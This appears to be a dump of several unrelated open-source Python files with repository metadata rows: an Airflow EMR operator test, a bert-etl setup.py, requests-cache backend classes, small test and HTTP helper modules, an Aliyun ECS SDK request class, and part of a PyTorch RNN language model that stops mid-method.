'StepIds': ['s-2LH3R5GW3A53T']
}
class TestEmrAddStepsOperator(unittest.TestCase):
# When
_config = [{
'Name': 'test_step',
'ActionOnFailure': 'CONTINUE',
'HadoopJarStep': {
'Jar': 'command-runner.jar',
'Args': [
'/usr/lib/spark/bin/run-example',
'{{ macros.ds_add(ds, -1) }}',
'{{ ds }}'
]
}
}]
def setUp(self):
configuration.load_test_config()
args = {
'owner': 'airflow',
'start_date': DEFAULT_DATE
}
# Mock out the emr_client (moto has incorrect response)
self.emr_client_mock = MagicMock()
self.operator = EmrAddStepsOperator(
task_id='test_task',
job_flow_id='j-8989898989',
aws_conn_id='aws_default',
steps=self._config,
dag=DAG('test_dag_id', default_args=args)
)
def test_init(self):
self.assertEqual(self.operator.job_flow_id, 'j-8989898989')
self.assertEqual(self.operator.aws_conn_id, 'aws_default')
def test_render_template(self):
ti = TaskInstance(self.operator, DEFAULT_DATE)
ti.render_templates()
expected_args = [{
'Name': 'test_step',
'ActionOnFailure': 'CONTINUE',
'HadoopJarStep': {
'Jar': 'command-runner.jar',
'Args': [
'/usr/lib/spark/bin/run-example',
(DEFAULT_DATE - timedelta(days=1)).strftime("%Y-%m-%d"),
DEFAULT_DATE.strftime("%Y-%m-%d"),
]
}
}]
self.assertListEqual(self.operator.steps, expected_args)
def test_execute_returns_step_id(self):
self.emr_client_mock.add_job_flow_steps.return_value = ADD_STEPS_SUCCESS_RETURN
# Mock out the emr_client creator
emr_session_mock = MagicMock()
emr_session_mock.client.return_value = self.emr_client_mock
self.boto3_session_mock = MagicMock(return_value=emr_session_mock)
with patch('boto3.session.Session', self.boto3_session_mock):
self.assertEqual(self.operator.execute(None), ['s-2LH3R5GW3A53T'])
if __name__ == '__main__':
unittest.main()
| 31.509615
| 87
| 0.627708
|
ce0fe024420e5205c65baac06451da8fc0b538f3
| 2,777
|
py
|
Python
|
setup.py
|
jbcurtin/bert
|
956e1647b590ac13b679579231b085895778d807
|
[
"MIT"
] | 2
|
2019-08-28T21:39:50.000Z
|
2019-12-17T10:53:28.000Z
|
setup.py
|
jbcurtin/bert
|
956e1647b590ac13b679579231b085895778d807
|
[
"MIT"
] | 19
|
2019-09-04T21:19:12.000Z
|
2021-03-28T22:10:32.000Z
|
setup.py
|
jbcurtin/bert
|
956e1647b590ac13b679579231b085895778d807
|
[
"MIT"
] | 1
|
2019-08-28T21:39:53.000Z
|
2019-08-28T21:39:53.000Z
|
import os
import sys
from setuptools import find_packages, setup
# Hacky, but functional
file_dir: str = os.path.dirname(__file__)
bert_path: str = os.path.join(file_dir, 'bert')
if not os.path.exists(bert_path):
raise NotImplementedError
sys.path.append(file_dir)
import bert
# Always reference code-origin
# https://github.com/django/django/blob/master/setup.py#L7
CURRENT_PYTHON = sys.version_info[:2]
REQUIRED_PYTHON = (3, 6)
if CURRENT_PYTHON < REQUIRED_PYTHON:
sys.stderr.write("""
==========================
Unsupported Python version
==========================
This version of bert-etl requires Python {}.{}, but you're trying to
install it on Python {}.{}.
This may be because you are using a version of pip that doesn't
understand the python_requires classifier. Make sure you
have pip >= 9.0 and setuptools >= 24.2, then try again:
$ python -m pip install --upgrade pip setuptools
$ python -m pip install bert
This will install the latest version of bert-etl which works on your
version of Python
""".format(*(REQUIRED_PYTHON + CURRENT_PYTHON)))
sys.exit(1)
EXCLUDE_FROM_PACKAGES = ['bert.bin']
version = '0.4.77'
description = 'A microframework for simple ETL solutions'
def read(fname):
with open(os.path.join(os.path.dirname(__file__), fname)) as f:
return f.read()
setup(
name='bert-etl',
version=version,
python_requires='>={}.{}'.format(*REQUIRED_PYTHON),
url='https://github.com/jbcurtin/bert',
author="Joseph Curtin <42@jbcurtin.io",
author_email='bert@jbcurtin.io',
description=description,
long_description=read('README.md'),
license='MIT',
packages=find_packages(exclude=EXCLUDE_FROM_PACKAGES),
include_package_data=True,
scripts=[],
install_requires=[
'redis==3.3.5',
'marshmallow==2.19.5',
'boto3==1.9.251',
'pyyaml==5.1.2',
'GitPython==3.1.1',
],
entry_points={
'console_scripts': [
'bert-example.py = bert.example.factory:run_from_cli',
'bert-deploy.py = bert.deploy.factory:run_from_cli',
'bert-runner.py = bert.runner.factory:run_from_cli',
'bert-secrets.py = bert.secrets.factory:run_from_cli',
'bert-roles.py = bert.roles.factory:run_from_cli',
'bert-debug.py = bert.debug.factory:run_from_cli',
]
},
zip_safe=False,
classifiers=[
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: 3 :: Only',
],
project_urls={}
)
| 30.516484
| 68
| 0.656824
|
6c692ab9e6f916ef135ba2435de22443ab86b790
| 10,237
|
py
|
Python
|
requests_cache/backends/base.py
|
parkerhancock/requests-cache
|
e3ae526cba37a4ea2d8a48b05aaeff062847c644
|
[
"BSD-2-Clause"
] | 1
|
2021-05-27T17:25:45.000Z
|
2021-05-27T17:25:45.000Z
|
requests_cache/backends/base.py
|
parkerhancock/requests-cache
|
e3ae526cba37a4ea2d8a48b05aaeff062847c644
|
[
"BSD-2-Clause"
] | null | null | null |
requests_cache/backends/base.py
|
parkerhancock/requests-cache
|
e3ae526cba37a4ea2d8a48b05aaeff062847c644
|
[
"BSD-2-Clause"
] | null | null | null |
import pickle
import warnings
from abc import ABC
from collections import UserDict
from collections.abc import MutableMapping
from datetime import datetime
from logging import getLogger
from typing import Iterable, Iterator, Tuple, Union
from ..cache_control import ExpirationTime
from ..cache_keys import create_key, remove_ignored_params, url_to_key
from ..models import AnyRequest, AnyResponse, CachedResponse
from ..serializers import init_serializer
# Specific exceptions that may be raised during deserialization
DESERIALIZE_ERRORS = (AttributeError, ImportError, TypeError, ValueError, pickle.PickleError)
ResponseOrKey = Union[CachedResponse, str]
logger = getLogger(__name__)
class BaseCache:
"""Base class for cache implementations, which can also be used as in-memory cache.
See :ref:`advanced_usage:custom backends` for details on creating your own implementation.
"""
def __init__(
self,
*args,
include_get_headers: bool = False,
ignored_parameters: Iterable[str] = None,
**kwargs,
):
self.name: str = ''
self.redirects: BaseStorage = DictStorage()
self.responses: BaseStorage = DictStorage()
self.include_get_headers = include_get_headers
self.ignored_parameters = ignored_parameters
@property
def urls(self) -> Iterator[str]:
"""Get all URLs currently in the cache (excluding redirects)"""
for response in self.values():
yield response.url
def save_response(self, response: AnyResponse, key: str = None, expires: datetime = None):
"""Save response to cache
Args:
key: key for this response
response: response to save
expires: Absolute expiration time for this cached response
"""
key = key or self.create_key(response.request)
cached_response = CachedResponse.from_response(response, expires=expires)
cached_response.request = remove_ignored_params(cached_response.request, self.ignored_parameters)
self.responses[key] = cached_response
def save_redirect(self, request: AnyRequest, response_key: str):
"""
Map a redirect request to a response. This makes it possible to associate many keys with a
single response.
Args:
request: Request object for redirect URL
response_key: Cache key which can be found in ``responses``
"""
self.redirects[self.create_key(request)] = response_key
def get_response(self, key: str, default=None) -> CachedResponse:
"""Retrieves response for `key` if it's stored in cache, otherwise returns `default`
Args:
key: Key of resource
default: Value to return if `key` is not in cache
"""
try:
if key not in self.responses:
key = self.redirects[key]
response = self.responses[key]
response.reset() # In case response was in memory and content has already been read
return response
except KeyError:
return default
except DESERIALIZE_ERRORS as e:
logger.error(f'Unable to deserialize response with key {key}: {str(e)}')
logger.debug(e, exc_info=True)
return default
def delete(self, key: str):
"""Delete a response or redirect from the cache, as well any associated redirect history"""
# If it's a response key, first delete any associated redirect history
try:
for r in self.responses[key].history:
del self.redirects[create_key(r.request, self.ignored_parameters)]
except (KeyError, *DESERIALIZE_ERRORS):
pass
# Then delete the response itself, or just the redirect if it's a redirect key
for cache in [self.responses, self.redirects]:
try:
del cache[key]
except KeyError:
pass
def delete_url(self, url: str):
"""Delete a cached response + redirects for ``GET <url>``"""
self.delete(url_to_key(url, self.ignored_parameters))
def bulk_delete(self, keys: Iterable[str]):
"""Remove multiple responses and their associated redirects from the cache"""
self.responses.bulk_delete(keys)
# Remove any redirects that no longer point to an existing response
invalid_redirects = [k for k, v in self.redirects.items() if v not in self.responses]
self.redirects.bulk_delete(set(keys) | set(invalid_redirects))
def clear(self):
"""Delete all items from the cache"""
logger.info('Clearing all items from the cache')
self.responses.clear()
self.redirects.clear()
def remove_expired_responses(self, expire_after: ExpirationTime = None):
"""Remove expired and invalid responses from the cache, optionally with revalidation
Args:
expire_after: A new expiration time used to revalidate the cache
"""
logger.info(
'Removing expired responses.'
+ (f' Revalidating with: {expire_after}' if expire_after else '')
)
keys_to_update = {}
keys_to_delete = []
for key, response in self._get_valid_responses(delete=True):
# If we're revalidating and it's not yet expired, update the cached item's expiration
if expire_after is not None and not response.revalidate(expire_after):
keys_to_update[key] = response
if response.is_expired:
keys_to_delete.append(key)
# Delay updates & deletes until the end, to avoid conflicts with _get_valid_responses()
logger.debug(f'Deleting {len(keys_to_delete)} expired responses')
self.bulk_delete(keys_to_delete)
if expire_after is not None:
logger.debug(f'Updating {len(keys_to_update)} revalidated responses')
for key, response in keys_to_update.items():
self.responses[key] = response
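# Illustrative note (an addition, not from the original module): when `expire_after`
# is given, each still-valid response is revalidated against the new expiration;
# entries that end up expired are bulk-deleted and the rest are written back with
# their updated expiration time.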
def remove_old_entries(self, *args, **kwargs):
msg = 'BaseCache.remove_old_entries() is deprecated; please use CachedSession.remove_expired_responses()'
warnings.warn(DeprecationWarning(msg))
self.remove_expired_responses(*args, **kwargs)
def create_key(self, request: AnyRequest, **kwargs) -> str:
"""Create a normalized cache key from a request object"""
return create_key(request, self.ignored_parameters, self.include_get_headers, **kwargs) # type: ignore
def has_key(self, key: str) -> bool:
"""Returns `True` if cache has `key`, `False` otherwise"""
return key in self.responses or key in self.redirects
def has_url(self, url: str) -> bool:
"""Returns `True` if cache has `url`, `False` otherwise. Works only for GET request urls"""
return self.has_key(url_to_key(url, self.ignored_parameters)) # noqa: W601
def keys(self, check_expiry=False) -> Iterator[str]:
"""Get all cache keys for redirects and valid responses combined"""
yield from self.redirects.keys()
for key, _ in self._get_valid_responses(check_expiry=check_expiry):
yield key
def values(self, check_expiry=False) -> Iterator[CachedResponse]:
"""Get all valid response objects from the cache"""
for _, response in self._get_valid_responses(check_expiry=check_expiry):
yield response
def response_count(self, check_expiry=False) -> int:
"""Get the number of responses in the cache, excluding invalid (unusable) responses.
Can also optionally exclude expired responses.
"""
return len(list(self.values(check_expiry=check_expiry)))
def _get_valid_responses(
self, check_expiry=False, delete=False
) -> Iterator[Tuple[str, CachedResponse]]:
"""Get all responses from the cache, and skip (+ optionally delete) any invalid ones that
can't be deserialized. Can also optionally check response expiry and exclude expired responses.
"""
invalid_keys = []
for key in self.responses.keys():
try:
response = self.responses[key]
if check_expiry and response.is_expired:
invalid_keys.append(key)
else:
yield key, response
except DESERIALIZE_ERRORS:
invalid_keys.append(key)
# Delay deletion until the end, to improve responsiveness when used as a generator
if delete:
logger.debug(f'Deleting {len(invalid_keys)} invalid/expired responses')
self.bulk_delete(invalid_keys)
def __str__(self):
"""Show a count of total **rows** currently stored in the backend. For performance reasons,
this does not check for invalid or expired responses.
"""
return f'Total rows: {len(self.responses)} responses, {len(self.redirects)} redirects'
def __repr__(self):
return f'<{self.__class__.__name__}(name={self.name})>'
class BaseStorage(MutableMapping, ABC):
"""Base class for backend storage implementations
Args:
secret_key: Optional secret key used to sign cache items for added security
salt: Optional salt used to sign cache items
serializer: Custom serializer that provides ``loads`` and ``dumps`` methods
"""
def __init__(
self,
serializer=None,
**kwargs,
):
self.serializer = init_serializer(serializer, **kwargs)
logger.debug(f'Initializing {type(self).__name__} with serializer: {self.serializer}')
def bulk_delete(self, keys: Iterable[str]):
"""Delete multiple keys from the cache. Does not raise errors for missing keys. This is a
basic version that subclasses should override with a more efficient backend-specific
version, if possible.
"""
for k in keys:
try:
del self[k]
except KeyError:
pass
def __str__(self):
return str(list(self.keys()))
class DictStorage(UserDict, BaseStorage):
"""A basic dict wrapper class for non-persistent storage"""
| 40.462451
| 113
| 0.654196
|
598cc5c8bff3bf2e2aa26b77d5e292ba6b6145c1
| 522
|
py
|
Python
|
tests/core/test_bugzilla.py
|
moisesguimaraes/trellozilla
|
09779fbc29df5896c895aaa30e8a49ac57b7c1fc
|
[
"Apache-2.0"
] | 2
|
2019-09-26T10:04:51.000Z
|
2021-01-28T16:18:31.000Z
|
tests/core/test_bugzilla.py
|
moisesguimaraes/trellozilla
|
09779fbc29df5896c895aaa30e8a49ac57b7c1fc
|
[
"Apache-2.0"
] | null | null | null |
tests/core/test_bugzilla.py
|
moisesguimaraes/trellozilla
|
09779fbc29df5896c895aaa30e8a49ac57b7c1fc
|
[
"Apache-2.0"
] | 1
|
2021-01-19T14:11:00.000Z
|
2021-01-19T14:11:00.000Z
|
import unittest
from unittest import mock
from trellozilla.core import bugzilla
class TestBugzilla(unittest.TestCase):
"""Tests for `trellozilla.core.bugzilla`."""
def test_get_api_client(self):
with mock.patch("bugzilla.Bugzilla") as bugzilla_client_mock:
conf_mock = mock.Mock()
bugzilla.get_api_client(conf_mock)
bugzilla_client_mock.assert_called_once_with(
conf_mock.bugzilla.url,
api_key=conf_mock.bugzilla.api_key,
)
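# Convenience entry point (an addition, not from the original test module): allows
# running this file directly with the standard unittest runner.
if __name__ == "__main__":
    unittest.main()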
| 26.1
| 67
| 0.666667
|
2ebc372b208427233b147f52a7f6450ab23534c5
| 1,832
|
py
|
Python
|
TestHelper.py
|
garethsb-sony/nmos-testing
|
2436972ff495c5942bb29cd0f440cb848eb04ccd
|
[
"Apache-2.0"
] | null | null | null |
TestHelper.py
|
garethsb-sony/nmos-testing
|
2436972ff495c5942bb29cd0f440cb848eb04ccd
|
[
"Apache-2.0"
] | null | null | null |
TestHelper.py
|
garethsb-sony/nmos-testing
|
2436972ff495c5942bb29cd0f440cb848eb04ccd
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2018 Riedel Communications GmbH & Co. KG
#
# Modifications Copyright 2018 British Broadcasting Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import requests
def ordered(obj):
if isinstance(obj, dict):
return sorted((k, ordered(v)) for k, v in obj.items())
if isinstance(obj, list):
return sorted(ordered(x) for x in obj)
else:
return obj
def compare_json(json1, json2):
"""Compares two json objects for equality"""
return ordered(json1) == ordered(json2)
def do_request(method, url, data=None):
"""Perform a basic HTTP request with appropriate error handling"""
try:
s = requests.Session()
req = None
if data is not None:
req = requests.Request(method, url, json=data)
else:
req = requests.Request(method, url)
prepped = req.prepare()
r = s.send(prepped)
return True, r
except requests.exceptions.Timeout:
return False, "Connection timeout"
except requests.exceptions.TooManyRedirects:
return False, "Too many redirects"
except requests.exceptions.ConnectionError as e:
return False, str(e)
except requests.exceptions.RequestException as e:
return False, str(e)
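# Illustrative usage sketch (an addition, not from the original helper module). The
# URL below is a placeholder; substitute the endpoint of the API under test.
if __name__ == "__main__":
    assert compare_json({"a": [2, 1]}, {"a": [1, 2]})  # order-insensitive comparison
    success, result = do_request("GET", "http://example.com/")
    if success:
        print("HTTP {}".format(result.status_code))
    else:
        print("Request failed: {}".format(result))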
| 33.309091
| 75
| 0.663755
|
af2016a00dc3d30cfb5968d422e424c20d19378e
| 3,181
|
py
|
Python
|
aliyun-python-sdk-ecs/aliyunsdkecs/request/v20140526/DescribePhysicalConnectionsRequest.py
|
liumihust/aliyun-openapi-python-sdk
|
c7b5dd4befae4b9c59181654289f9272531207ef
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-ecs/aliyunsdkecs/request/v20140526/DescribePhysicalConnectionsRequest.py
|
liumihust/aliyun-openapi-python-sdk
|
c7b5dd4befae4b9c59181654289f9272531207ef
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-ecs/aliyunsdkecs/request/v20140526/DescribePhysicalConnectionsRequest.py
|
liumihust/aliyun-openapi-python-sdk
|
c7b5dd4befae4b9c59181654289f9272531207ef
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkecs.endpoint import endpoint_data
class DescribePhysicalConnectionsRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Ecs', '2014-05-26', 'DescribePhysicalConnections','ecs')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_ClientToken(self):
return self.get_query_params().get('ClientToken')
def set_ClientToken(self,ClientToken):
self.add_query_param('ClientToken',ClientToken)
def get_PageNumber(self):
return self.get_query_params().get('PageNumber')
def set_PageNumber(self,PageNumber):
self.add_query_param('PageNumber',PageNumber)
def get_PageSize(self):
return self.get_query_params().get('PageSize')
def set_PageSize(self,PageSize):
self.add_query_param('PageSize',PageSize)
def get_UserCidr(self):
return self.get_query_params().get('UserCidr')
def set_UserCidr(self,UserCidr):
self.add_query_param('UserCidr',UserCidr)
def get_ResourceOwnerAccount(self):
return self.get_query_params().get('ResourceOwnerAccount')
def set_ResourceOwnerAccount(self,ResourceOwnerAccount):
self.add_query_param('ResourceOwnerAccount',ResourceOwnerAccount)
def get_OwnerAccount(self):
return self.get_query_params().get('OwnerAccount')
def set_OwnerAccount(self,OwnerAccount):
self.add_query_param('OwnerAccount',OwnerAccount)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId)
def get_Filters(self):
return self.get_query_params().get('Filters')
def set_Filters(self,Filters):
for i in range(len(Filters)):
for j in range(len(Filters[i].get('Values'))):
if Filters[i].get('Values')[j] is not None:
self.add_query_param('Filter.' + str(i + 1) + '.Value.'+str(j + 1), Filters[i].get('Values')[j])
if Filters[i].get('Key') is not None:
self.add_query_param('Filter.' + str(i + 1) + '.Key' , Filters[i].get('Key'))
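# Illustrative usage sketch (an addition, not from the original SDK file); the filter
# key and value are placeholders, and actually sending the request would additionally
# require an authenticated AcsClient from aliyunsdkcore.
if __name__ == "__main__":
    request = DescribePhysicalConnectionsRequest()
    request.set_PageNumber(1)
    request.set_PageSize(10)
    request.set_Filters([{"Key": "Name", "Values": ["example-connection"]}])
    print(request.get_query_params())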
| 34.956044
| 102
| 0.747564
|
1d6fd137c4cf79bd554ca6c1b04cc88669bfa909
| 20,667
|
py
|
Python
|
lmp/model/_rnn.py
|
shangrex/language-model-playground
|
d3aaf768f6cd57c5c2b263da46a36ffd23fcd51b
|
[
"Beerware"
] | 9
|
2020-07-31T10:27:28.000Z
|
2021-12-23T05:58:03.000Z
|
lmp/model/_rnn.py
|
shangrex/language-model-playground
|
d3aaf768f6cd57c5c2b263da46a36ffd23fcd51b
|
[
"Beerware"
] | 10
|
2020-07-28T05:32:52.000Z
|
2022-03-04T06:36:23.000Z
|
lmp/model/_rnn.py
|
shangrex/language-model-playground
|
d3aaf768f6cd57c5c2b263da46a36ffd23fcd51b
|
[
"Beerware"
] | 20
|
2020-07-08T07:05:39.000Z
|
2021-09-22T07:20:46.000Z
|
r"""Vanilla RNN language model."""
import argparse
from typing import ClassVar, Dict, List, Optional
import torch
import torch.nn as nn
import torch.nn.functional as F
from lmp.model._base import BaseModel
from lmp.tknzr._base import BaseTknzr
class RNNModel(BaseModel):
r"""Vanilla RNN language model.
Use ``self.loss_fn`` for training and use ``self.pred`` for inference.
Both depend on the forward pass algorithm ``self.forward``.
Parameters
==========
d_emb: int
Token embedding dimension.
Must be bigger than or equal to ``1``.
d_hid: int
Hidden dimension for Feed-Forward layers and RNN layers.
Must be bigger than or equal to ``1``.
kwargs: Dict, optional
Unused parameter.
Intentionally left for subclass parameter extension.
n_hid_lyr: int
Number of RNN layers.
Must be bigger than or equal to ``1``.
n_post_hid_lyr: int
Number of Feed-Forward layers after RNN layers.
All layers are paired with ReLU activations except for the last one.
Must be bigger than or equal to ``1``.
n_pre_hid_lyr: int
Number of Feed-Forward layers before RNN layers.
All layers are paired with ReLU activations.
Must be bigger than or equal to ``1``.
p_emb: float
Dropout probability for token embeddings.
Must satisfy ``0.0 <= p_emb <= 1.0``.
p_hid: float
Dropout probability for every hidden representation.
Must satisfy ``0.0 <= p_hid <= 1.0``.
tknzr: lmp.tknzr.BaseTknzr
Tokenizer instance with attributes ``pad_tkid`` and ``vocab_size``.
Attributes
==========
emb: torch.nn.Embedding
Token embedding lookup matrix.
Use token ids to lookup token embeddings.
emb_dp: torch.nn.Dropout
Token embedding dropout.
Drop embedding features with probability ``p_emb``.
hid: torch.nn.RNN
Vanilla RNN which encodes temporal features.
Each time step's hidden state depends on current input and previous
hidden state.
Dropout temporal features with probability ``p_hid`` if
``n_hid_lyr > 1``.
model_name: ClassVar[str]
Model name is ``RNN``.
Used for command line argument parsing.
post_hid: torch.nn.Sequential
Rectified Feed-Forward layers which transform temporal features from
hidden dimension ``d_hid`` to embedding dimension ``d_emb``.
Drop rectified units with probability ``p_hid``.
pre_hid: torch.nn.Sequential
Rectified Feed-Forward layers which transform token embeddings from
embedding dimension ``d_emb`` to hidden dimension ``d_hid``.
Drop rectified units with probability ``p_hid``.
"""
model_name: ClassVar[str] = 'RNN'
def __init__(
self,
*,
d_emb: int,
d_hid: int,
n_hid_lyr: int,
n_post_hid_lyr: int,
n_pre_hid_lyr: int,
p_emb: float,
p_hid: float,
tknzr: BaseTknzr,
**kwargs: Optional[Dict],
):
super().__init__()
#######################################################################
# Required parameters section.
#######################################################################
# ---------------------------------------------------------------------
# Checking parameter `d_emb`.
if not isinstance(d_emb, int):
raise TypeError('`d_emb` must be an instance of `int`.')
if d_emb < 1:
raise ValueError('`d_emb` must be bigger than or equal to `1`.')
# Finish checking parameter `d_emb`.
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
# Checking parameter `d_hid`.
if not isinstance(d_hid, int):
raise TypeError('`d_hid` must be an instance of `int`.')
if d_hid < 1:
raise ValueError('`d_hid` must be bigger than or equal to `1`.')
# Finish checking parameter `d_hid`.
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
# Checking parameter `n_hid_lyr`.
if not isinstance(n_hid_lyr, int):
raise TypeError('`n_hid_lyr` must be an instance of `int`.')
if n_hid_lyr < 1:
raise ValueError(
'`n_hid_lyr` must be bigger than or equal to `1`.')
# Finish checking parameter `n_hid_lyr`.
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
# Checking parameter `n_post_hid_lyr`.
if not isinstance(n_post_hid_lyr, int):
raise TypeError('`n_post_hid_lyr` must be an instance of `int`.')
if n_post_hid_lyr < 1:
raise ValueError(
'`n_post_hid_lyr` must be bigger than or equal to `1`.'
)
# Finish checking parameter `n_post_hid_lyr`.
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
# Checking parameter `n_pre_hid_lyr`.
if not isinstance(n_pre_hid_lyr, int):
raise TypeError('`n_pre_hid_lyr` must be an instance of `int`.')
if n_pre_hid_lyr < 1:
raise ValueError(
'`n_pre_hid_lyr` must be bigger than or equal to `1`.'
)
# Finish checking parameter `n_pre_hid_lyr`.
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
# Checking parameter `p_emb`.
if not isinstance(p_emb, float):
raise TypeError('`p_emb` must be an instance of `float`.')
if not (0.0 <= p_emb <= 1.0):
raise ValueError(
'`p_emb` must be in the range from `0.0` to `1.0`.'
)
# Finish checking parameter `p_emb`.
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
# Checking parameter `p_hid`.
if not isinstance(p_hid, float):
raise TypeError('`p_hid` must be an instance of `float`.')
if not (0.0 <= p_hid <= 1.0):
raise ValueError(
'`p_hid` must be in the range from `0.0` to `1.0`.'
)
# Finish checking parameter `p_hid`.
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
# Checking parameter `tknzr`.
if not isinstance(tknzr, BaseTknzr):
raise TypeError('`tknzr` must be an instance of `BaseTknzr`.')
# Finish checking parameter `tknzr`.
# ---------------------------------------------------------------------
# Token embedding layer.
# Use token ids to lookup token embeddings.
# Input tensor : Batch of token ids.
# Input shape : `(B, S)`.
# Input dtype : `torch.int64`.
# Output tensor: Batch of token embeddings.
# Output shape : `(B, S, E)`.
# Output dtype : `torch.float32`.
self.emb = nn.Embedding(
num_embeddings=tknzr.vocab_size,
embedding_dim=d_emb,
padding_idx=tknzr.pad_tkid,
)
# Token embedding dropout layer.
# Drop embedding features with probability `p_emb`.
# Input tensor : Output of `self.emb`.
# Input shape : `(B, S, E)`.
# Input dtype : `torch.float32`.
# Output tensor: Batch of sparse token embeddings.
# Output shape : `(B, S, E)`.
# Output dtype : `torch.float32`.
self.emb_dp = nn.Dropout(p=p_emb)
# Rectified Feed-Forward layers which transform token embeddings from
# embedding dimension `d_emb` to hidden dimension `d_hid`.
# Drop rectified units with probability `p_hid`.
# Input tensor : Output of `self.emb_dp`.
# Input shape : `(B, S, E)`.
# Input dtype : `torch.float32`.
# Output tensor: Batch of sparse rectified token representation.
# Output shape : `(B, S, H)`.
# Output dtype : `torch.float32`.
pre_hid: List[nn.Module] = [
nn.Linear(in_features=d_emb, out_features=d_hid),
nn.ReLU(),
nn.Dropout(p=p_hid),
]
for _ in range(n_pre_hid_lyr - 1):
pre_hid.append(nn.Linear(in_features=d_hid, out_features=d_hid))
pre_hid.append(nn.ReLU())
pre_hid.append(nn.Dropout(p=p_hid))
self.pre_hid = nn.Sequential(*pre_hid)
# Vanilla RNN which encodes temporal features.
# Each time step's hidden state depends on current input and previous
# hidden state.
# Dropout temporal features if `n_hid_lyr > 1`.
# Input tensor : Output of `self.pre_hid`.
# Input shape : `(B, S, H)`.
# Input dtype : `torch.float32`.
# Output tensor: Batch of recurrent token hidden states.
# Output shape : `(B, S, H)`.
# Output dtype : `torch.float32`.
self.hid: nn.Module
if n_hid_lyr == 1:
self.hid = nn.RNN(
input_size=d_hid,
hidden_size=d_hid,
batch_first=True,
)
else:
self.hid = nn.RNN(
input_size=d_hid,
hidden_size=d_hid,
num_layers=n_hid_lyr,
dropout=p_hid,
batch_first=True,
)
# Rectified Feed-Forward layers which transform temporal features from
# hidden dimension `d_hid` to embedding dimension `d_emb`.
# Drop rectified units with probability `p_hid`.
# Input tensor : Output of `self.hid`.
# Input shape : `(B, S, H)`.
# Input dtype : `torch.float32`.
# Output tensor: Batch of sparse rectified next token embeddings.
# Output shape : `(B, S, E)`.
# Output dtype : `torch.float32`.
post_hid: List[nn.Module] = []
for _ in range(n_post_hid_lyr - 1):
post_hid.append(nn.Dropout(p=p_hid))
post_hid.append(nn.Linear(in_features=d_hid, out_features=d_hid))
post_hid.append(nn.ReLU())
post_hid.append(nn.Dropout(p=p_hid))
post_hid.append(nn.Linear(in_features=d_hid, out_features=d_emb))
self.post_hid = nn.Sequential(*post_hid)
# Calculate cross entropy loss for all non-padding tokens.
self.loss_ignore_padding = nn.CrossEntropyLoss(
ignore_index=tknzr.pad_tkid
)
def forward(self, batch_prev_tkids: torch.Tensor) -> torch.Tensor:
r"""Perform forward pass.
Forward pass algorithm is structured as follows:
#. Input batch of previous token ids.
(shape: ``(B, S)``)
#. Use batch of previous token ids to perform token embeddings lookup
on ``self.emb``.
(shape: ``(B, S, E)``)
#. Use ``self.emb_dp`` to drop some features in token embeddings.
(shape: ``(B, S, E)``)
#. Use ``self.pre_hid`` to transform token embeddings from embedding
dimension ``E`` to hidden dimension ``H``.
(shape: ``(B, S, H)``)
#. Use ``self.hid`` to encode temporal features.
(shape: ``(B, S, H)``)
#. Use ``self.post_hid`` to transform temporal features from hidden
dimension ``H`` to embedding dimension ``E``.
(shape: ``(B, S, E)``)
#. Find the most probable next token id in embedding matrix
``self.emb`` using inner product.
This reduces parameters since we share weights between the token embedding
and the output projection.
(shape: ``(B, S, V)``)
#. Return logits.
Used with ``self.pred`` to convert logit into prediction.
Used with ``self.loss_fn`` to perform optimization.
(shape: ``(B, S, V)``)
Parameters
==========
batch_prev_tkids: torch.Tensor
Batch of previous token ids encoded by
:py:class:`lmp.tknzr.BaseTknzr` subclass instance.
``batch_prev_tkids`` has shape ``(B, S)`` and
``dtype == torch.int64``.
Returns
=======
torch.Tensor
Next token logits for each token id in batch.
Logits has shape ``(B, S, V)`` and ``dtype == torch.float32``.
"""
# Token embedding lookup.
# Input shape: `(B, S)`.
# Output shape: `(B, S, E)`.
batch = self.emb(batch_prev_tkids)
# Token embedding dropout.
# Input shape: `(B, S, E)`.
# Output shape: `(B, S, E)`.
batch = self.emb_dp(batch)
# Transform from embedding dimension to hidden dimension.
# Input shape: `(B, S, E)`.
# Output shape: `(B, S, H)`.
batch = self.pre_hid(batch)
# Encode temporal features.
# Input shape: `(B, S, H)`.
# Output shape: `(B, S, H)`.
